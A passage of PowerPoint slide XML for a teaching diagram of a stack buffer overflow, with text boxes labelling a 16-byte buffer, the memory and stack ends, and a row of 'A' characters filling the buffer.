            <a:ext cx="3048000" cy="609600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:schemeClr val="bg2"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fa-IR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17423" name="Text Box 23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2895600" y="3733800"/>
            <a:ext cx="928688" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>buffer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17424" name="Text Box 25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3200400" y="2819400"/>
            <a:ext cx="387350" cy="336550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600"/>
              <a:t>16</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17425" name="Text Box 26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7423944" y="3091656"/>
            <a:ext cx="2128838" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Top of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bottom of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17426" name="Text Box 27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="-5400000">
            <a:off x="-619125" y="3209925"/>
            <a:ext cx="2517775" cy="822325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Bottom of memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Top of stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 94"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="5943600" y="3276600"/>
            <a:ext cx="806450" cy="366713"/>
            <a:chOff x="2976" y="2064"/>
            <a:chExt cx="508" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17479" name="Text Box 55"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3264" y="2064"/>
              <a:ext cx="220" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17480" name="Text Box 56"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="2064"/>
              <a:ext cx="220" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17481" name="Text Box 57"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3072" y="2064"/>
              <a:ext cx="220" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17482" name="Text Box 58"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2976" y="2064"/>
              <a:ext cx="220" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1800">
                  <a:solidFill>
                    <a:schemeClr val="hlink"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17428" name="Text Box 59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2362200" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17429" name="Text Box 62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2209800" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17430" name="Text Box 63"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17431" name="Text Box 64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2514600" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17432" name="Text Box 65"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4191000" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17433" name="Text Box 66"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17434" name="Text Box 67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17435" name="Text Box 68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4343400" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17436" name="Text Box 77"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2971800" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17437" name="Text Box 78"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2819400" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17438" name="Text Box 79"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3276600" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17439" name="Text Box 80"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3124200" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17440" name="Text Box 81"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3581400" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17441" name="Text Box 82"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3429000" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17442" name="Text Box 83"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17443" name="Text Box 84"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3733800" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17444" name="Text Box 85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1752600" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17445" name="Text Box 87"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17446" name="Text Box 88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="3276600"/>
            <a:ext cx="349250" cy="366713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="Group 95"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="4724400" y="3276600"/>
            <a:ext cx="806450" cy="366713"/>
            <a:chOff x="2976" y="2064"/>
            <a:chExt cx="508" cy="231"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17475" name="Text Box 96"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3264" y="2064"/>
              <a:ext cx="220" cy="231"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
